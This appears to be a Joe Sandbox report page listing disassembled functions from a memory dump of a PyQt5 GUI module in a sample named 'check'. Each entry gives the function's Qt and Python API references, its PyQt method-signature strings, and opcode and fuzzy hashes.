Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Transform@@$SubtypeType_V0@@
String ID: 1J9
API String ID: 2489541258-2407233842
Opcode ID: 8af3d714492ba531aa15746caac70b04ab0781d1bbfeadf077fb0fe067feb4a2
Instruction ID: c036ee2de1bdd4cc572be45aa7b27d5dd495dd54b41372ab4deb6fe9a8c09bb4
Opcode Fuzzy Hash: 8af3d714492ba531aa15746caac70b04ab0781d1bbfeadf077fb0fe067feb4a2
Instruction Fuzzy Hash: E8411BA6A0CA5681EB619F2AF844169B3B4FB89BD4F184472DF4D03B68DF7CD445D700

Function 00007FFB9A321970 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 94COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON3 ref: 00007FFB9A321997
??_0QVector4D@@QEAAAEAV0@M@Z.QT5GUI ref: 00007FFB9A321A1D
??_0QVector4D@@QEAAAEAV0@AEBV0@@Z.QT5GUI ref: 00007FFB9A321A72

Strings

1J9, xrefs: 00007FFB9A321A4A

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ??_0Vector4$SubtypeType_V0@@
String ID: 1J9
API String ID: 2115489448-2407233842
Opcode ID: cbd49fbf05ff3dc5f3da5c49ad96ba42d4d616930bfedab7bff3a6bbd37fae6b
Instruction ID: 906bbd78f0a60098484f894e9ecff3f16b6f43ec25af1f8df85c9628b5c4aa10
Opcode Fuzzy Hash: cbd49fbf05ff3dc5f3da5c49ad96ba42d4d616930bfedab7bff3a6bbd37fae6b
Instruction Fuzzy Hash: B0413DB6A0CA5681EB609B66F85416AB374FB89BD4F084072DE4D03B68DF7CE485CB00

Function 00007FFB9A2E7A10 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 91COMMON

Download Yara Rule

APIs

?parent@QStandardItemModel@@UEBA?AVQModelIndex@@AEBV2@@Z.QT5GUI ref: 00007FFB9A2E7ACA
?parent@QObject@@QEBAPEAV1@XZ.QT5CORE ref: 00007FFB9A2E7B64

Strings

BJ9, xrefs: 00007FFB9A2E7A69
parent(self, child: QModelIndex) -> QModelIndexparent(self) -> Optional[QObject], xrefs: 00007FFB9A2E7B9C
parent, xrefs: 00007FFB9A2E7BAB
QStandardItemModel, xrefs: 00007FFB9A2E7BB2

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?parent@$Index@@ItemModelModel@@Object@@StandardV2@@
String ID: BJ9$QStandardItemModel$parent$parent(self, child: QModelIndex) -> QModelIndexparent(self) -> Optional[QObject]
API String ID: 1065259071-183512387
Opcode ID: 125cd4ff7d0439f89bbbef2b21f20c6a3a68f52241ea6fd5e2709d8b66037e57
Instruction ID: a9773ad9f6fe88d7195d962eccc64adf1bda38b0b0cb88675b9a1becf6e21e73
Opcode Fuzzy Hash: 125cd4ff7d0439f89bbbef2b21f20c6a3a68f52241ea6fd5e2709d8b66037e57
Instruction Fuzzy Hash: CB413AB2708B8685EB708B25E8443AA77A8FB96B84F548176DE8D47764DF3CD198C700

Function 00007FFB9A341EC0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 82COMMON

Download Yara Rule

APIs

?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A341F46
?setProperty@QTextFormat@@QEAAXHAEBV?$QVector@VQTextLength@@@@@Z.QT5GUI ref: 00007FFB9A341FF8

Strings

setProperty, xrefs: 00007FFB9A34201C
BiJ1, xrefs: 00007FFB9A341EF6, 00007FFB9A341FA7
QTextFormat, xrefs: 00007FFB9A342023
setProperty(self, propertyId: int, value: Any)setProperty(self, propertyId: int, lengths: Iterable[QTextLength]), xrefs: 00007FFB9A342011

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Text$?setFormat@@Property@$Length@@@@@Variant@@@Vector@
String ID: BiJ1$QTextFormat$setProperty$setProperty(self, propertyId: int, value: Any)setProperty(self, propertyId: int, lengths: Iterable[QTextLength])
API String ID: 7694866-1449459306
Opcode ID: a54922d9ce7c459d363fe7fecec685ade460285478461004204ebcf58ab484b1
Instruction ID: 53f26aa4f97ab49e24542331c9eb8de9e4e8701a3e577f263d9d617eed85af5d
Opcode Fuzzy Hash: a54922d9ce7c459d363fe7fecec685ade460285478461004204ebcf58ab484b1
Instruction Fuzzy Hash: 4441F4B6A08B4689EB608F61E8842E937B8FB48B88F544176DE4C53728DF38E455C750

Function 00007FFB9A329C90 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 74windowCOMMON

Download Yara Rule

APIs

?brush@QPalette@@QEBAAEBVQBrush@@W4ColorGroup@1@W4ColorRole@1@@Z.QT5GUI ref: 00007FFB9A329D21
??0QBrush@@QEAA@AEBV0@@Z.QT5GUI ref: 00007FFB9A329D2D

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Strings

brush, xrefs: 00007FFB9A329DD9
QPalette, xrefs: 00007FFB9A329DE0
brush(self, cg: QPalette.ColorGroup, cr: QPalette.ColorRole) -> QBrushbrush(self, cr: QPalette.ColorRole) -> QBrush, xrefs: 00007FFB9A329DCD
BEE, xrefs: 00007FFB9A329CB7

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: Brush@@Color$?brush@Group@1@Palette@@Role@1@@V0@@malloc
String ID: BEE$QPalette$brush$brush(self, cg: QPalette.ColorGroup, cr: QPalette.ColorRole) -> QBrushbrush(self, cr: QPalette.ColorRole) -> QBrush
API String ID: 868068763-1019518128
Opcode ID: 867119840c303b20faf8d7d60e1d5fe1d016ff79275cae7d2928c073b9acf2ca
Instruction ID: 832c301e1159577e42779cd0d40f5e96da3c2445b84cdf8cdda46e82ff95f466
Opcode Fuzzy Hash: 867119840c303b20faf8d7d60e1d5fe1d016ff79275cae7d2928c073b9acf2ca
Instruction Fuzzy Hash: BA413FB6708B4685EB60CF21E8483A973A8FB88B84F504176DE8D47764EF7CD449C750

Function 00007FFB9A32B9E0 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 72COMMON

Download Yara Rule

APIs

??0QTransform@@QEAA@XZ.QT5GUI ref: 00007FFB9A32BA0C

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

?alphaMapForGlyph@QRawFont@@QEBA?AVQImage@@IW4AntialiasingType@1@AEBVQTransform@@@Z.QT5GUI ref: 00007FFB9A32BAE8

Strings

alphaMapForGlyph(self, glyphIndex: int, antialiasingType: QRawFont.AntialiasingType = QRawFont.SubPixelAntialiasing, transform: QTransform = QTransform()) -> QImage, xrefs: 00007FFB9A32BB2A
QRawFont, xrefs: 00007FFB9A32BB40
Bu|EJ9, xrefs: 00007FFB9A32BA93
alphaMapForGlyph, xrefs: 00007FFB9A32BB39

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?alphaAntialiasingFont@@Glyph@Image@@Transform@@Transform@@@Type@1@malloc
String ID: Bu|EJ9$QRawFont$alphaMapForGlyph$alphaMapForGlyph(self, glyphIndex: int, antialiasingType: QRawFont.AntialiasingType = QRawFont.SubPixelAntialiasing, transform: QTransform = QTransform()) -> QImage
API String ID: 2236108326-2617967261
Opcode ID: b2e79b768cedeeaccc4dde49c14aaa2efe96b6fc4c9e2887c1ee0e5293eb28e5
Instruction ID: f53b87fe0f3164538f81bae86be0249d307c8438bf4cf2779fd0ac32045f477f
Opcode Fuzzy Hash: b2e79b768cedeeaccc4dde49c14aaa2efe96b6fc4c9e2887c1ee0e5293eb28e5
Instruction Fuzzy Hash: D741FD76608B86C5EB608F25F4443AAB7A8FB89B84F544176DA8C43B24DF7CD184CB40

Function 00007FFB9A347F00 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 66COMMON

Download Yara Rule

APIs

??0QTransform@@QEAA@XZ.QT5GUI ref: 00007FFB9A347F60
?toSubpathPolygons@QPainterPath@@QEBA?AV?$QList@VQPolygonF@@@@AEBVQTransform@@@Z.QT5GUI ref: 00007FFB9A347F74

Part of subcall function 00007FFB9A3F9D18: malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,00007FFB9A2D12CB), ref: 00007FFB9A3F9D32

Strings

BJ9, xrefs: 00007FFB9A347FBC
QPainterPath, xrefs: 00007FFB9A348033
toSubpathPolygons, xrefs: 00007FFB9A34802C
toSubpathPolygons(self) -> List[QPolygonF]toSubpathPolygons(self, matrix: QTransform) -> List[QPolygonF], xrefs: 00007FFB9A34801D

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: F@@@@List@PainterPath@@PolygonPolygons@SubpathTransform@@Transform@@@malloc
String ID: BJ9$QPainterPath$toSubpathPolygons$toSubpathPolygons(self) -> List[QPolygonF]toSubpathPolygons(self, matrix: QTransform) -> List[QPolygonF]
API String ID: 4180688332-3469042540
Opcode ID: 09f6e970277203bfa695a4b67e419d1ff0a81003babc1b905d6afeb44c97d0e8
Instruction ID: 87c7db27d2c89ed42c5abcd05b70fa7ee66d6e9f49786ed151099dd94be2fa43
Opcode Fuzzy Hash: 09f6e970277203bfa695a4b67e419d1ff0a81003babc1b905d6afeb44c97d0e8
Instruction Fuzzy Hash: 0B314CB6609B8681EB60CF25E8487A973A8FB99B84F604176DE8D07364DF3CD549C740

Function 00007FFB9A2D5B00 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 59COMMON

Download Yara Rule

APIs

?remove@?$QVector@VQPointF@@@@QEAAXH@Z.QT5CORE ref: 00007FFB9A2D5B5B
?remove@?$QVector@VQPointF@@@@QEAAXHH@Z.QT5CORE ref: 00007FFB9A2D5BD5

Strings

QPolygonF, xrefs: 00007FFB9A2D5BF7
remove, xrefs: 00007FFB9A2D5BF0
remove(self, i: int)remove(self, i: int, count: int), xrefs: 00007FFB9A2D5BE4
Bii, xrefs: 00007FFB9A2D5B94

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: ?remove@?$F@@@@PointVector@
String ID: Bii$QPolygonF$remove$remove(self, i: int)remove(self, i: int, count: int)
API String ID: 1048307195-760695207
Opcode ID: 3ebd16274e152da31aba7cbb7d918c5cd54bb37fc648e21e8f81b480778cd0a6
Instruction ID: e50c855c3a67d6d2bf81671359b3778cbe139651323bbdafc1c422fa3291acd0
Opcode Fuzzy Hash: 3ebd16274e152da31aba7cbb7d918c5cd54bb37fc648e21e8f81b480778cd0a6
Instruction Fuzzy Hash: E5310BB6618B46C2EB10CF25E8885AA77B8FB88B84F604172DA8D43734DF3CD549CB40

Function 00007FFB9A367940 Relevance: 10.6, APIs: 7, Instructions: 53COMMON

Download Yara Rule

APIs

PyList_Size.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A367955
PyList_Size.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A36797F
PyList_Size.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A36798F
PyList_GetItem.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A3679A6
PyLong_AsLong.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A3679AF
PyErr_Occurred.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A3679B8
PyList_Size.PYTHON3(?,?,?,00007FFB9A2DDC52), ref: 00007FFB9A3679C9

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

Associated: 0000001A.00000002.2241691480.00007FFB9A2D0000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242009106.00007FFB9A3FB000.00000002.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242171569.00007FFB9A4B8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242236220.00007FFB9A4BA000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242287731.00007FFB9A4BE000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242355437.00007FFB9A4C6000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242535107.00007FFB9A4D2000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242730346.00007FFB9A4D8000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2242889931.00007FFB9A4DA000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243114142.00007FFB9A4E5000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243251374.00007FFB9A4F1000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243496140.00007FFB9A4F7000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243602086.00007FFB9A4F8000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243790236.00007FFB9A50C000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2243891657.00007FFB9A50D000.00000008.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244016633.00007FFB9A50E000.00000004.00000001.01000000.00000063.sdmpDownload File
Associated: 0000001A.00000002.2244074025.00007FFB9A510000.00000002.00000001.01000000.00000063.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ffb9a2d0000_check.jbxd

Similarity

API ID: List_$Size$Err_ItemLongLong_Occurred
String ID:
API String ID: 1563076613-0
Opcode ID: f6d74b0eebfb0542bff139fa9cb2c9d8bb32ddff33178bdba29a571611cfec5b
Instruction ID: 2ee40a7f70892ab47fc3d78f89eda669217ebd8c6c7450ca853e8700ce8528c6
Opcode Fuzzy Hash: f6d74b0eebfb0542bff139fa9cb2c9d8bb32ddff33178bdba29a571611cfec5b
Instruction Fuzzy Hash: 9311B260B1975142EFA49B36F9041397294AF89FD0B440174EF6F53BE5DE7CD0418700

Function 00007FFB9A325F00 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

??0QVariant@@QEAA@H@Z.QT5CORE ref: 00007FFB9A325F6F
?setProperty@QTextFormat@@QEAAXHAEBVQVariant@@@Z.QT5GUI ref: 00007FFB9A325F82
??1QVariant@@QEAA@XZ.QT5CORE ref: 00007FFB9A325F8D

Strings

QTextBlockFormat, xrefs: 00007FFB9A325FCB
setMarker, xrefs: 00007FFB9A325FC4
setMarker(self, marker: QTextBlockFormat.MarkerType), xrefs: 00007FFB9A325FB5

Memory Dump Source

Source File: 0000001A.00000002.2241766241.00007FFB9A2D1000.00000020.00000001.01000000.00000063.sdmp, Offset: 00007FFB9A2D0000, based on PE: true

